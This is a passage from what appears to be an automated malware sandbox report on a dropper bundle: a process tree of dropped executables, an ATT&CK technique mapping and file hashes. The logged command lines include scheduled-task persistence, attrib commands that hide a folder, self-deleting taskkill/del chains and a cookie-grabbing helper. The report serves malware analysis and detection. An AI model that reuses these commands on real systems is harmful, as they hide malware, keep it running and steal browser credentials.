                                                                            PID:4212
                                                                        • C:\Users\Admin\Documents\EgrmhLecW_0ALzKA0p2oWYgm.exe
                                                                          "C:\Users\Admin\Documents\EgrmhLecW_0ALzKA0p2oWYgm.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Drops desktop.ini file(s)
                                                                          PID:4840
                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                            schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                            7⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:4544
                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                            cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                            7⤵
                                                                              PID:5744
                                                                              • C:\Windows\system32\attrib.exe
                                                                                attrib +H +S "C:\ProgramData\\Provisioning"
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Views/modifies file attributes
                                                                                PID:4812
                                                                              • C:\Windows\system32\attrib.exe
                                                                                attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                8⤵
                                                                                • Views/modifies file attributes
                                                                                PID:5900
                                                                            • C:\ProgramData\Provisioning\settings.exe
                                                                              "C:\ProgramData\Provisioning\settings.exe"
                                                                              7⤵
                                                                              • Drops file in Drivers directory
                                                                              • Drops desktop.ini file(s)
                                                                              PID:5496
                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                                                                8⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:3788
                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                cmd /c attrib +H +S "C:\ProgramData\\Provisioning" & attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                8⤵
                                                                                  PID:5992
                                                                                  • C:\Windows\system32\attrib.exe
                                                                                    attrib +H +S "C:\ProgramData\\Provisioning"
                                                                                    9⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:1380
                                                                                  • C:\Windows\system32\attrib.exe
                                                                                    attrib +H +S "C:\ProgramData\\Provisioning\*" /S /D
                                                                                    9⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:6016
                                                                            • C:\Users\Admin\Documents\7nVIW3mzPUAT3OD9C48uZ1Mq.exe
                                                                              "C:\Users\Admin\Documents\7nVIW3mzPUAT3OD9C48uZ1Mq.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:4832
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 656
                                                                                7⤵
                                                                                • Program crash
                                                                                PID:5496
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 672
                                                                                7⤵
                                                                                • Program crash
                                                                                PID:5596
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 676
                                                                                7⤵
                                                                                • Program crash
                                                                                PID:5688
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 672
                                                                                7⤵
                                                                                • Program crash
                                                                                PID:5816
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 1120
                                                                                7⤵
                                                                                • Program crash
                                                                                PID:3752
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 1152
                                                                                7⤵
                                                                                • Program crash
                                                                                PID:5284
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 1228
                                                                                7⤵
                                                                                • Program crash
                                                                                PID:5548
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 1256
                                                                                7⤵
                                                                                • Program crash
                                                                                PID:4884
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "7nVIW3mzPUAT3OD9C48uZ1Mq.exe" /f & erase "C:\Users\Admin\Documents\7nVIW3mzPUAT3OD9C48uZ1Mq.exe" & exit
                                                                                7⤵
                                                                                  PID:5456
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill /im "7nVIW3mzPUAT3OD9C48uZ1Mq.exe" /f
                                                                                    8⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:5204
                                                                              • C:\Users\Admin\Documents\RQLPxVGYPFNDiIqcNB0Kis8Q.exe
                                                                                "C:\Users\Admin\Documents\RQLPxVGYPFNDiIqcNB0Kis8Q.exe"
                                                                                6⤵
                                                                                  PID:4824
                                                                                  • C:\Users\Admin\Documents\RQLPxVGYPFNDiIqcNB0Kis8Q.exe
                                                                                    C:\Users\Admin\Documents\RQLPxVGYPFNDiIqcNB0Kis8Q.exe
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4632
                                                                                • C:\Users\Admin\Documents\CTaZ5lYTcMf0xE2pxfZIIUfu.exe
                                                                                  "C:\Users\Admin\Documents\CTaZ5lYTcMf0xE2pxfZIIUfu.exe"
                                                                                  6⤵
                                                                                    PID:4812
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\CTaZ5lYTcMf0xE2pxfZIIUfu.exe"
                                                                                      7⤵
                                                                                        PID:4544
                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                          timeout /T 10 /NOBREAK
                                                                                          8⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:6088
                                                                                    • C:\Users\Admin\Documents\roMOHxgPK1jM6BajaAQqlP_S.exe
                                                                                      "C:\Users\Admin\Documents\roMOHxgPK1jM6BajaAQqlP_S.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4796
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im roMOHxgPK1jM6BajaAQqlP_S.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\roMOHxgPK1jM6BajaAQqlP_S.exe" & del C:\ProgramData\*.dll & exit
                                                                                        7⤵
                                                                                          PID:4852
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /im roMOHxgPK1jM6BajaAQqlP_S.exe /f
                                                                                            8⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:6136
                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                            timeout /t 6
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:5004
                                                                                      • C:\Users\Admin\Documents\hW7FU3kvsXOWjqC2hQNpiEdS.exe
                                                                                        "C:\Users\Admin\Documents\hW7FU3kvsXOWjqC2hQNpiEdS.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4788
                                                                                        • C:\Users\Admin\Documents\hW7FU3kvsXOWjqC2hQNpiEdS.exe
                                                                                          "C:\Users\Admin\Documents\hW7FU3kvsXOWjqC2hQNpiEdS.exe" -a
                                                                                          7⤵
                                                                                            PID:6004
                                                                                        • C:\Users\Admin\Documents\eo38R5eZP1Xm5tT9GjirPGrY.exe
                                                                                          "C:\Users\Admin\Documents\eo38R5eZP1Xm5tT9GjirPGrY.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4432
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6274242979.exe"
                                                                                            7⤵
                                                                                              PID:1648
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:4824
                                                                                              • C:\Users\Admin\AppData\Local\Temp\6274242979.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\6274242979.exe"
                                                                                                8⤵
                                                                                                  PID:5608
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im 6274242979.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\6274242979.exe" & del C:\ProgramData\*.dll & exit
                                                                                                    9⤵
                                                                                                      PID:4800
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /im 6274242979.exe /f
                                                                                                        10⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:4772
                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                        timeout /t 6
                                                                                                        10⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:3680
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7545644598.exe"
                                                                                                  7⤵
                                                                                                    PID:2088
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7545644598.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7545644598.exe"
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5304
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "eo38R5eZP1Xm5tT9GjirPGrY.exe" /f & erase "C:\Users\Admin\Documents\eo38R5eZP1Xm5tT9GjirPGrY.exe" & exit
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3880
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /im "eo38R5eZP1Xm5tT9GjirPGrY.exe" /f
                                                                                                      8⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:4748
                                                                                                • C:\Users\Admin\Documents\4elz7tw91fdgNMrrjv0ekYS0.exe
                                                                                                  "C:\Users\Admin\Documents\4elz7tw91fdgNMrrjv0ekYS0.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4408
                                                                                                • C:\Users\Admin\Documents\ahLBHHp6JbahatmPO3bxuOhM.exe
                                                                                                  "C:\Users\Admin\Documents\ahLBHHp6JbahatmPO3bxuOhM.exe"
                                                                                                  6⤵
                                                                                                    PID:4412
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:1798690 "__IRAFN:C:\Users\Admin\Documents\ahLBHHp6JbahatmPO3bxuOhM.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-3686645723-710336880-414668232-1000"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:5884
                                                                                                      • C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Checks processor information in registry
                                                                                                        PID:4888
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im smartmap.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Roaming\Sentry Framework\smartmap.exe" & del C:\ProgramData\*.dll & exit
                                                                                                          9⤵
                                                                                                            PID:6036
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /im smartmap.exe /f
                                                                                                              10⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:5152
                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                              timeout /t 6
                                                                                                              10⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:6004
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                  4⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3692
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS00603894\sonia_6.exe
                                                                                                    sonia_6.exe
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3212
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:188
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5160
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                      6⤵
                                                                                                        PID:4124
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        6⤵
                                                                                                          PID:5668
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                      4⤵
                                                                                                        PID:3260
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 544
                                                                                                        4⤵
                                                                                                        • Program crash
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:684
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                        4⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:1940
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                                        4⤵
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:3104
                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                  1⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • Modifies registry class
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:8
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                    2⤵
                                                                                                    • Checks processor information in registry
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    • Modifies registry class
                                                                                                    PID:3524
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                    2⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Checks processor information in registry
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    • Modifies registry class
                                                                                                    PID:3972
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\sonia_2.exe
                                                                                                  sonia_2.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:1612
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\sonia_4.exe
                                                                                                  sonia_4.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:576
                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                  1⤵
                                                                                                  • Process spawned unexpected child process
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:1576
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                    2⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:2928
                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                  1⤵
                                                                                                  • Process spawned unexpected child process
                                                                                                  PID:4784
                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                    2⤵
                                                                                                    • Blocklisted process makes network request
                                                                                                    PID:3488
                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                  1⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Modifies registry class
                                                                                                  PID:3488
                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                  1⤵
                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                  PID:6072
                                                                                                • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5040
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:5592
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:5688
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:4440
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:3280
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:5728
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:2248
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:4428
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Checks processor information in registry
                                                                                                                PID:5608
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:5816

                                                                                                                Network

                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                Execution

                                                                                                                Scheduled Task

                                                                                                                1
                                                                                                                T1053

                                                                                                                Persistence

                                                                                                                Modify Existing Service

                                                                                                                1
                                                                                                                T1031

                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                1
                                                                                                                T1060

                                                                                                                Scheduled Task

                                                                                                                1
                                                                                                                T1053

                                                                                                                Hidden Files and Directories

                                                                                                                1
                                                                                                                T1158

                                                                                                                Privilege Escalation

                                                                                                                Scheduled Task

                                                                                                                1
                                                                                                                T1053

                                                                                                                Defense Evasion

                                                                                                                Modify Registry

                                                                                                                3
                                                                                                                T1112

                                                                                                                Disabling Security Tools

                                                                                                                1
                                                                                                                T1089

                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                1
                                                                                                                T1497

                                                                                                                Install Root Certificate

                                                                                                                1
                                                                                                                T1130

                                                                                                                Hidden Files and Directories

                                                                                                                1
                                                                                                                T1158

                                                                                                                Credential Access

                                                                                                                Credentials in Files

                                                                                                                4
                                                                                                                T1081

                                                                                                                Discovery

                                                                                                                Query Registry

                                                                                                                5
                                                                                                                T1012

                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                1
                                                                                                                T1497

                                                                                                                System Information Discovery

                                                                                                                5
                                                                                                                T1082

                                                                                                                Peripheral Device Discovery

                                                                                                                1
                                                                                                                T1120

                                                                                                                Collection

                                                                                                                Data from Local System

                                                                                                                4
                                                                                                                T1005

                                                                                                                Command and Control

                                                                                                                Web Service

                                                                                                                1
                                                                                                                T1102

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\libcurl.dll
                                                                                                                  MD5

                                                                                                                  d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                  SHA1

                                                                                                                  028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                  SHA256

                                                                                                                  0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                  SHA512

                                                                                                                  857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\libcurlpp.dll
                                                                                                                  MD5

                                                                                                                  e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                  SHA1

                                                                                                                  b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                  SHA256

                                                                                                                  43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                  SHA512

                                                                                                                  9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\libgcc_s_dw2-1.dll
                                                                                                                  MD5

                                                                                                                  9aec524b616618b0d3d00b27b6f51da1

                                                                                                                  SHA1

                                                                                                                  64264300801a353db324d11738ffed876550e1d3

                                                                                                                  SHA256

                                                                                                                  59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                  SHA512

                                                                                                                  0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\libstdc++-6.dll
                                                                                                                  MD5

                                                                                                                  5e279950775baae5fea04d2cc4526bcc

                                                                                                                  SHA1

                                                                                                                  8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                  SHA256

                                                                                                                  97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                  SHA512

                                                                                                                  666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\libwinpthread-1.dll
                                                                                                                  MD5

                                                                                                                  1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                  SHA1

                                                                                                                  fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                  SHA256

                                                                                                                  509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                  SHA512

                                                                                                                  3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\setup_install.exe
                                                                                                                  MD5

                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                  SHA1

                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                  SHA256

                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                  SHA512

                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\setup_install.exe
                                                                                                                  MD5

                                                                                                                  a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                  SHA1

                                                                                                                  e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                  SHA256

                                                                                                                  0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                  SHA512

                                                                                                                  c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\sonia_1.exe
                                                                                                                  MD5

                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                  SHA1

                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                  SHA256

                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                  SHA512

                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\sonia_1.exe
                                                                                                                  MD5

                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                  SHA1

                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                  SHA256

                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                  SHA512

                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\sonia_1.txt
                                                                                                                  MD5

                                                                                                                  6e43430011784cff369ea5a5ae4b000f

                                                                                                                  SHA1

                                                                                                                  5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                  SHA256

                                                                                                                  a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                  SHA512

                                                                                                                  33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\sonia_2.exe
                                                                                                                  MD5

                                                                                                                  18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                  SHA1

                                                                                                                  f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                  SHA256

                                                                                                                  365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                  SHA512

                                                                                                                  db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\sonia_2.txt
                                                                                                                  MD5

                                                                                                                  18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                  SHA1

                                                                                                                  f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                  SHA256

                                                                                                                  365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                  SHA512

                                                                                                                  db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS00603894\sonia_3.exe
                                                                                                                  MD5

                                                                                                                  ee658be7ea7269085f4004d68960e547

                                                                                                                  SHA1

                                                                                                                  979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                  SHA256

                                                                                                                  d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                  SHA512

